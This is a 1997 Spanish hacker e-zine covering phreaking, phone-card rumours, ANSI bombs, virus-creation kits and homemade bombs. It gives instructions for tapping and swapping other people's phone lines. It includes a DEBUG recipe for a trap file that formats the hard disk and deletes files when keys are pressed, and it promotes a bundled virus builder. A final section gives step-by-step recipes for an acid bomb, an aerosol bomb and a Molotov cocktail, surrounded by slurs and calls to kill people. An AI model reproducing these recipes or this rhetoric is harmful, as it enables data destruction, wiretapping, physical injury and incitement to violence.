

# CyberHack Magazine #1

## Indice:

1. - Introducción.
2. - Phreaking en España.
3. - Timofónica y sus tarjetas.
4. - Bombas Ansii.
5. - Laboratorios creadores de virus.
6. - Un poco sobre anarquía. (Bombas).

---

## 1. - Introducción.

Pues si, como decía eljaker, este tipo de revistas van orientadas a gente con mente abierta, con ideas libres, pasando de censuras porque lo que debería imperar es la libertad de expresión. Para ello debería haber una especie de democracia, y no lo que tenemos en este país.

Pues bueno, vayamos al grano... Esta revista es española, para españoles y tratando temas de Hacking, Phreaking, etc. referente a nuestro querido país... por eso todos los WEB mas importantes de hack españoles están en EEUU, porque nos sobra la libertad de expresión en España. De todos modos el autor de esta revista <Cy> no está dispuesto a que le digan nada... jejejejeje, porque esto solo tiene un fin científico y didáctico .... cualquier puesta en uso de alguno de estos conocimientos puede ser un delito... Quedáis advertidos..... X.-)

## 2.- Phreaking en España.

Bueno pues precisamente en España hay que ser un maquina para hacer una blue box, ya que Timofónica tiene unos sistemas de seguridad bastante avanzados, si, si es verdad ... a ver quien a tenido güebos ( jeje) de hacer una blue box que funcione. Pues bueno, así que entonces hay que recurrir a sistemas mas artesanales, como intercambio de líneas, o callback (que ya explicaré).

El intercambio de líneas es muy simple .... si vives en un piso, medianamente antiguo es mas fácil todavía, ya que te vas a la planta baja y te pones a buscar como un condenado la caja de timofonica. Cuando la encuentres, busca tu línea (normalmente tienen unas etiquetitas para diferenciar unas de otras. Si no es así, la única manera es bajarte a las dos de la madrugada cuando no vaya a entrar nadie, y con un teléfono con los cables pelados, ir pinchando uno a uno hasta que encuentres el tuyo...

pero.... ¿como sabrás que es tuyo?, pues en tu casita descuelgas el teléfono y pones alguna música o ruido o... a tu perro ladrando... lo que quieras. Después de eso, lo único que tienes que hacer es intercambiar las líneas.

Bueno, también nos queda el método de pincharla, que es lo mas fácil del mundo... coges un teléfono, le pelas los cables y le sueltas dos alfileres, y pinchas en el plástico de la línea hasta tocar el cobre (ADVERTENCIA: Está un poco duro) si no funciona cambia la polaridad.... si pinchas los cables negros que pasan por la calle ten en cuenta que hay tres y uno de ellos no vale para nada. Si te fijas bien, hay uno que está mas separado que los otros dos... pues ese es el que no vale para nada (bueno creo que era para las cabinas).

La próxima E-Zine un poquito más... jejejeje ;)

## 3.- Timofónica y sus tarjetas.

Bueno, se oyen rumores muy raros de que las tarjetas de telefónica se pueden recargar, de varias maneras .... uno me dice que metiéndola en el microondas, otro que poniéndole un cacho de aluminio y pasándole la plancha,

otro que metiéndole la antena de televisión.... PUES NO!!!!!!! no se pueden recargar coño.... la única manera de poder hacer algo es emulándola.... y hay que saber algo de electrónica.

Pues para mas información recurrir al texto de José Manuel García (EMULADOR DE PROM), hay encontrareis los circuitos para emularla y sus especificaciones técnicas... en fin..... un gran trabajo :)

#### 4.- Bombas ANSII.

Las bombas ANSII son un poco desconocidas pero pueden ser letales porque est n donde menos te los esperas. Est n construidas a partir de códigos ansii, y simplemente ejecutan las instrucciones que tu le des (como un BATCH), lo que pasa que están en ansii y las puedes poner al final de una pantalla ansii con colorines y esas chorradas.

En realidad ahora voy a presentar algunos métodos avanzados pero una bomba ansii se consigue realmente escribiendo en ansii la instrucción que quieres que el ordenador ejecute, escondido en un texto ansii, (no ASCII) y cuando el usuario chequea virus, no se cosca. Por eso tienes que saber a quien pasárselas porque no son contagiosas.

Ahora, eso si, tienes que tener cargado el device=ansii.sys, pero de todos modos hay programas que no lo necesitan .... aunque lo propio es que el usuario tenga en el config.sys el DAVICE=C:\DOS\ANSII.SYS. De todos modos incluyo en el paquete un creador de bombas ansii.

\*\*\* COMO CRAEAR BOMBAS ANSII USANDO EL DEBUG DEL MS-DOS? \*\*\*

--DEBUG ???

Lo siento pero no me voy a poner a enseñar instrucciones para debug, así que lee el manual

--METODO

-Aquí es necesario crear una formula para hacer la bomba ....simplemente cambia los comandos de la formula por los de tu elección.

```
A:DOS\DEBUG
-A 100
MOV AH,9
MOV DX,109
INT 21
INT 20
####:#### DB 1B'[0 ;32;"ECHO Y|FORMAT C:>NUL";13p'
####:???? DB 1B'[0;21;"echo Y|Del *.*>nul";13p'
-N boom!.com
-R BX
BX:0000
:0
-R CX
CX 0000
:???? (Escribe el numero " ??" de arriba aquí!!)
-W
```

después de esto el ordenador pondrá:

```
WRITING nnnn bytes
-Q
```

Cuando mires ahora el directorio habrá un programa llamado Boom!. com NO LO EJECUTES!! es una bomba y como pulses la barra de espacio te formateará el disco duro, y cuando alguien ponga ! borraré el directorio.

Pues aquí tienes una manera para partir la pana... disfrutala.....  
:) jejejejeje

He aqui una pequeña tablita de códigos ASCII:

ASCII Códigos de teclas...

a-97	b-98	c-99	d-100	e-101	f-102	g-103	h-104	i-105	j-106
k-107	l-108	m-109	n-110	o-111	p-112	q-113	r-114	s-115	t-116
u-117	v-118	w-119	x-120	y-121	z-122	( Space)-32			
A-65	B-66	C-67	D-68	E-69	F-70	G-71	H-72	I-73	J-74
K-75	L-76	M-77	N-78	O-79	P-80	Q-81	R-82	S-83	T-84
U-85	V-86	W-87	X-88	Y-89	Z-90	( return)-13			
1-49	2-50	3-51	4-52	5-53	6-54	7-55	8-56	9-57	0-48

\*\*\* CAMBIANDO LOS COLORES DEL SISTEMA \*\*\*

He aquí otra manera de utilizar el driver ASNSII ....Cambiando los colores del sistema. Para eso utiliza " Prompt \$e[# ;#m" command

Parece una mierda pero seguro que alguien le encuentra una utilidad a esto ....  
por si acaso incluyo una tabla de colores

--FOREGROUND COLORS--

30	black
31	red
32	green
33	yellow
34	blue
35	magenta
36	cyan
37	white

--BACKGROUND COLORS--

40	Black
41	red
42	green
43	yellow
44	blue
45	magenta
46	cyan
47	white

0 pondrá todos los colores en su valor inicial

Seguiré contando cosas mas avanzadas sobre este tema en proximos números....

## 5.- Laboratorios creadores de Virus.

No voy a comentar nada acerca de como se hace un virus porque entre otras cosas yo no soy coder pero eso no significa que puedas reventarle el ordenador a tu peor enemigo con uno de tu propia cosecha. Digo esto porque por la RED circulan unos programillas muy apañados que te los hacen ellos mismos, metiéndole tu los datos como: fecha de activación, tipo de daño, texto a poner..... la verdad es que estn muy guapos y algunos vienen con técnicas Stealth y todo.... por eso en el paquete de este mes incluyo uno.... jejejee ten cuidadín jarrrrl, porque te puedes quedar sin ordenador en un ratillo.... aconsejo que se use con precaución.

## 6.- Un poco sobre anarquía (BOMBAS).

Bueno, para empezar solo digo que no son para matar a nadie, ni mucho menos, solo para matar a los putos ETARRAS que deberían estar en la silla eléctrica, ya que no valen ni la bala que los mate .... hijos de puta.....

cabrones.... bastardos..... maricones sin güevos, cagaos, os tenían que matar al estilo Alforfonnes, y que quede claro que digo etarras y no vascos, porque vascos los hay muy apañaos.

Esto es simplemente diversion y no apologia al terrorismo, a si que si consigues hacer algo, te vas al medio de un campo a tirarlo.

En este numero vamos a tratar un poco las bombas caseras. jejeje.... todo el mundo las puede hacer.

### **\*\*\* BOMBA ACIDA \*\*\***

Es barata y los materiales se consiguen en un supermercado... jejejejejejeje

Materiales:

- 1 botella de 2 litros de cocacola vacia (importante que se de cocacola, fanta, o algo así porque son muy resistentes)
- Un poco de papel de aluminio
- Agua Fuerte ( Salfumant). no amoniaco, sino agua fuerte.

Preparación:

Hacer bolitas de aluminio e introducirlas en la botella hasta que ocupe una cuarta parte, echar con cuidado un buen chorreon de agua fuerte 1/8 de la botella, y cerrar fuertemente con el tapon, sin miedo, y lanzarla lo mas lejos posible... tardar de 15 a 20 seg. en explotar. Es muy peligroso que te reiente al lado, no por el ruido sino porque el liquido formado tras la reacción del agua fuerte con el alumino es muy chungo y si te cae en los ojos no lo cuentas .... pero..... ya sabes rapidez y no te la tires muy cerca. jejejeje (son de puta madre, meten una tralla impresionante).

### **\*\*\* BOMBA DE AEROSOL \*\*\***

Mas barata todavia que la anterior pero un pelín mas complicada.

Materiales:

- Un spray de laca, insecticida, o algun spray inflamable (nuevo)
- Una mechero (preferiblemente bueno, y si es ZIPPO mejor, en gibraltar están a 800 pts)
- Cinta aislante.

Preparación:

Consiste en atar el mechero al spray, dejar pillao con la cinta el botón que echa el spray, encender el mechero y correr. Al principio lo que valdrá es como lanzallamas, y si quieres puedes quemar a dos o tres, pero si lo dejas pillao y te vas, cuando el spray pierda presión la llama llegar a la boquilla, y volar todo por los aires. Tiene un efecto muy guapo.

### **\*\*\* COCKTAIL MOLOTOV \*\*\***

Todos sabemos que esto ya es mas serio, y no hace ruido, sino que es una bomba incendiaria.

Materiales:

- Botellas de cristal (cerveza, cocacola, etc)
- Gasolina
- Aceite (preferiblemente de coche)
- Trozos de trapos

Preparación:

Llenas las botellas a partes i guals de aceite y gasolina (el aceite es para que se pegue a la superficie lanzada), y la tapas con un trapo, haciendo de tapon, y que sea seguro, si no quieres que vuele la gasofa por los aires, y que sobresalga un trozo. Una vez que vaya a ser utilizado, se le prende fuego al trapo y.... con dos pelotas, lo lanzas lo mas lejos posible, y eso puede hacer mucha pupita. jejejeje ;)

Bueno, en la próxima revista encontrareis como hacer bombas de humo de diferentes colores, los principios de las bombas de explosivo plástico, y un montón de cosas más.

*(C) 1997 <cy> of CyberHacks. ☺*

E-Mail: [Cyberhackcy@geocities.com](mailto:Cyberhackcy@geocities.com)

WEB: HTTP ://WWW.GEOCITIES.COM/SILICONVALLEY/PINES/2558

Greetigs goes to: Freezer/Urbania, Warezzman, ElJacker, Paladdin, Nati, Cyberdemon, Tomcat, Daemon, AJMS, ... y toda la peña legal

: -?

; ) jejejejejeje

Próximo numero dentro de un par de semanas o tres (Bombas de humo de colores, más sobre bombas ANSi, Virus, hack, Phreak y Timofonía.)